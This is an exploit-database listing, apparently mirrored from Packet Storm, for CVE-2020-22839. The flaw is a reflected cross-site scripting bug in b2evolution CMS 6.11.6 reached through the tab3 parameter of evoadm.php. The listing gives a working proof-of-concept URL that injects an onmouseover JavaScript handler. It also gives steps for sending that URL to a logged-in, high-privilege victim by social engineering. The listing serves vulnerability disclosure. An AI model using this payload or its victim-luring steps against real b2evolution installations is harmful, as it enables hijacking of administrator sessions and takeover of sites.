Exploit for b2evolution CMS 6.11.6 Cross Site Scripting CVE-2020-22839

Name: Exploit for b2evolution CMS 6.11.6 Cross Site Scripting CVE-2020-22839
Rating: 5 (233 reviews)

2021-02-10 | CVSS 0.0

## https://sploitus.com/exploit?id=PACKETSTORM:161363
# Exploit Title: *Reflected XSS in b2evolution CMS 6.11.6 via tab3  
parameter in evoadm.php*  
# CVE : *CVE-2020-22839*  
# Date: 10/02/2021  
# Exploit Author: Nakul Ratti, Soham Bakore  
# Vendor Homepage: https://b2evolution.net/  
# Software Link:  
https://b2evolution.net/downloads/6-11-6-stable?download=12405  
# Version: 6.11.6  
# Tested on: latest version of Chrome, Firefox on Windows and Linux  
  
  
Vulnerable File:  
--------------------------  
http://host/evoadm.php  
  
Vulnerable Issue:  
--------------------------  
Tab3 parameter has no input validation.  
  
--------------------------Proof of Concept-----------------------  
Steps to Reproduce:  
  
1. Send the following URL *http://HOST/evoadm.php <http://host/evoadm.php>?*  
*.ctrl=comments&filter=restore&tab3=123%22onmouseover=%22alert(document.domain)%22&blog=1&blog=1*  
to  
the logged in victim using any social engineering technique.  
2. When an unsuspecting user with high privileges opens this URL, XSS will  
be triggered which will execute the malicious javascript payload in users  
browser.  
3. The vulnerable parameter in this case is “*tab3*”.